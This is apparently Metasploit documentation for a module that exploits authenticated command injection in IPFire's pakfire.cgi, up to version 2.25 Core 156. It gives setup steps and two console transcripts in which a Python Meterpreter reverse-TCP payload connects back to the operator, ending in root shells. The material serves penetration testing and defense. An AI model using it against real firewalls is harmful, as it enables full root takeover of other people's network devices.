## Vulnerable Application

  [IPFire 2.25 (Core Update 156)](https://downloads.ipfire.org/releases/ipfire-2.x/2.25-core156/ipfire-2.25.x86_64-full-core156.iso)
  [IPFire 2.21 (Core Update 126)](https://mirror.csclub.uwaterloo.ca/ipfire/releases/ipfire-2.x/2.21-core126/ipfire-2.21.x86_64-full-core126.iso)

  This module exploits an authenticated command injection vulnerability in the
  `/cgi-bin/pakfire.cgi` web page of IPFire devices running versions 2.25 Core Update 156
  and prior to execute arbitrary code as the `root` user.

## Verification Steps

  1. Start msfconsole
  1. Do: `use exploit/linux/http/ipfire_pakfire_exec`
  1. Do: `set username <USERNAME OF THE ADMINISTRATIVE USER TO AUTHENTICATE TO THE WEB PORTAL AS>`
  1. Do: `set password <PASSWORD FOR admin USER ON THE WEB PORTAL>`
  1. Do: `set rhost <TARGET IP>`
  1. Do: `set lhost <YOUR IP>`
  1. Do: `exploit`
  1. You should get a shell as the `root` user.

## Options

  **USERNAME**
  Username of the administrative user you are authenticating to the web portal as.

  **PASSWORD**
  Password for the administrative user you are authenticating to the web portal as.

## Scenarios

### IPFire 2.21 (Core Update 126)
```
msf6 > use exploit/linux/http/ipfire_pakfire_exec
[*] Using configured payload python/meterpreter/reverse_tcp
msf6 exploit(linux/http/ipfire_pakfire_exec) > show options

Module options (exploit/linux/http/ipfire_pakfire_exec):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   PASSWORD                   yes       Password to login with
   Proxies                    no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS                     yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT     444              yes       The target port (TCP)
   SRVHOST   0.0.0.0          yes       The local host or network interface to listen on. This must be an address on the local ma
                                        chine or 0.0.0.0 to listen on all addresses.
   SRVPORT   8080             yes       The local port to listen on.
   SSL       false            no        Negotiate SSL/TLS for outgoing connections
   SSLCert                    no        Path to a custom SSL certificate (default is randomly generated)
   URIPATH                    no        The URI to use for this exploit (default is random)
   USERNAME  admin            yes       User to login with
   VHOST                      no        HTTP server virtual host


Payload options (python/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST                   yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Python Dropper


msf6 exploit(linux/http/ipfire_pakfire_exec) > set RHOSTS 172.29.202.191
RHOSTS => 172.29.202.191
msf6 exploit(linux/http/ipfire_pakfire_exec) > set USERNAME admin
USERNAME => admin
msf6 exploit(linux/http/ipfire_pakfire_exec) > set PASSWORD admin
PASSWORD => admin
msf6 exploit(linux/http/ipfire_pakfire_exec) > set LHOST 172.29.202.153
LHOST => 172.29.202.153
msf6 exploit(linux/http/ipfire_pakfire_exec) > exploit

[*] Started reverse TCP handler on 172.29.202.153:4444
[*] Executing automatic check (disable AutoCheck to override)
[+] The target appears to be vulnerable. Target is running IPFire 2.21 (Core Update 126)
[*] Backing up backup.pl to /tmp/1TiE8...
[*] Overwriting the contents of backup.pl with a Python header statement
[*] Appending the contents of backup.pl with the Python code to be executed.
[*] Executing /usr/local/bin/backupctrl to run the payload
[*] Sending stage (39392 bytes) to 172.29.202.191
[*] Meterpreter session 1 opened (172.29.202.153:4444 -> 172.29.202.191:38336) at 2021-06-08 14:05:41 -0500
[+] You should now have your shell, restoring the original contents of the backup.pl file...
[*] All done, enjoy the shells!

meterpreter > sysinfo
Computer     : ipfire.localdomain
OS           : Linux 4.14.86-ipfire #1 SMP Tue Dec 11 08:36:08 GMT 2018
Architecture : x64
Meterpreter  : python/linux
meterpreter > getuid
Server username: root
meterpreter > shell
Process 28379 created.
Channel 1 created.
sh: cannot set terminal process group (27956): Inappropriate ioctl for device
sh: no job control in this shell
sh-4.3# id
uid=0(root) gid=0(root) groups=0(root)
sh-4.3#
```

### IPFire 2.25 (Core Update 156)

```
msf6 > use exploit/linux/http/ipfire_pakfire_exec
[*] Using configured payload python/meterpreter/reverse_tcp
msf6 exploit(linux/http/ipfire_pakfire_exec) > show options

Module options (exploit/linux/http/ipfire_pakfire_exec):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   PASSWORD                   yes       Password to login with
   Proxies                    no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS                     yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT     444              yes       The target port (TCP)
   SRVHOST   0.0.0.0          yes       The local host or network interface to listen on. This must be an address on the local ma
                                        chine or 0.0.0.0 to listen on all addresses.
   SRVPORT   8080             yes       The local port to listen on.
   SSL       false            no        Negotiate SSL/TLS for outgoing connections
   SSLCert                    no        Path to a custom SSL certificate (default is randomly generated)
   URIPATH                    no        The URI to use for this exploit (default is random)
   USERNAME  admin            yes       User to login with
   VHOST                      no        HTTP server virtual host


Payload options (python/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST                   yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Python Dropper


msf6 exploit(linux/http/ipfire_pakfire_exec) > set RHOST 172.29.202.157
RHOST => 172.29.202.157
msf6 exploit(linux/http/ipfire_pakfire_exec) > set USERNAME admin
USERNAME => admin
msf6 exploit(linux/http/ipfire_pakfire_exec) > set PASSWORD admin
PASSWORD => admin
msf6 exploit(linux/http/ipfire_pakfire_exec) > set LHOST 172.29.202.153
LHOST => 172.29.202.153
msf6 exploit(linux/http/ipfire_pakfire_exec) > exploit

[*] Started reverse TCP handler on 172.29.202.153:4444
[*] Executing automatic check (disable AutoCheck to override)
[+] The target appears to be vulnerable. Target is running IPFire 2.25 (Core Update 156)
[*] Backing up backup.pl to /tmp/8Yndo...
[*] Overwriting the contents of backup.pl with a Python header statement
[*] Appending the contents of backup.pl with the Python code to be executed.
[*] Executing /usr/local/bin/backupctrl to run the payload
[*] Sending stage (39392 bytes) to 172.29.202.157
[*] Meterpreter session 1 opened (172.29.202.153:4444 -> 172.29.202.157:37192) at 2021-06-08 14:02:03 -0500
[+] You should now have your shell, restoring the original contents of the backup.pl file...
[*] All done, enjoy the shells!

meterpreter > sysinfo
Computer     : ipfire.localdomain
OS           : Linux 4.14.212-ipfire #1 SMP Tue May 4 09:02:54 GMT 2021
Architecture : x64
Meterpreter  : python/linux
meterpreter > getuid
Server username: root
meterpreter > shell
Process 10179 created.
Channel 1 created.
sh: cannot set terminal process group (10136): Inappropriate ioctl for device
sh: no job control in this shell
sh-5.0# id
uid=0(root) gid=0(root) groups=0(root)
sh-5.0#
```